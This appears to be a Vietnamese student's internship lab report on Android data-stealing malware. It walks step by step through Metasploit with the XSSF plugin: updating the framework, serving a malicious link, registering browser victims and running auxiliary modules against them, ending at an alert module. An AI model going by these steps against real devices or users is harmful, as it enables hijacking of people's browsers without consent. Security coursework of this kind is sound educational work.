Sinh viên thực hiện : NGUYỄN QUỐC VƯƠNG . Lớp CNTT . Ca sáng 3 – 5 - 7

Báo cáo thực tập

Đề tài 5 : Nghiên cứu các Trojan ,Malware cho phép đánh cắp dữ liệu như danh sách contact ,

tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài

TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA MÃ ĐỘC

- Đầu tiên , khởi động Kali Linux -> khởi mở Terminal

- Lần lượt thực hiện 3 lệnh để cập nhật Framework

msfupdate

cd /opt/metasploit/apps/pro/msf3

svn export http://xssf.googlecode.com/svn/trunk/ ./ --force

- Thực hiện lệnh “msfconsole” để khởi động Metasploit

- Tiếp tục gõ lệnh “load xssf Port=80 Uri=/xssf/ Public=true Mode=Verbose” để

thực hiện XSSF.

- Thực hiện lệnh “xssf_urls” để nhận được các đường dẫn web như của XSSF Server

, XSSF test page , XSSF logs page …. Sau đó 1 máy nạn nhân bất kì truy cập vào

đường dẫn web XSSF test page :

- Ta được kết quả như hình . Đồng thời máy tấn công cũng nhận được thông báo :

New victim registered with id : 1

- Để kiểm tra số lượng nạn nhân truy cập vào đường dẫn ta dùng lệnh “xssf_victims”

lúc này sẽ xuất hiện lượng máy nạn nhân truy cập phải

- Bây giờ máy tấn công có thể xem thông tin và thực hiện khai thác dữ liệu về nạn

nhân bằng cách sử dụng lệnh :

Để kiểm tra thông tin về nạn nhân :

xssf_information <ID máy nạn nhân>

Để kiểm tra các quyền

Search auxiliary/xssf

Gửi thông báo xssf đến máy nạn nhân

Use auxililary/xssf/public/misc/alert

Run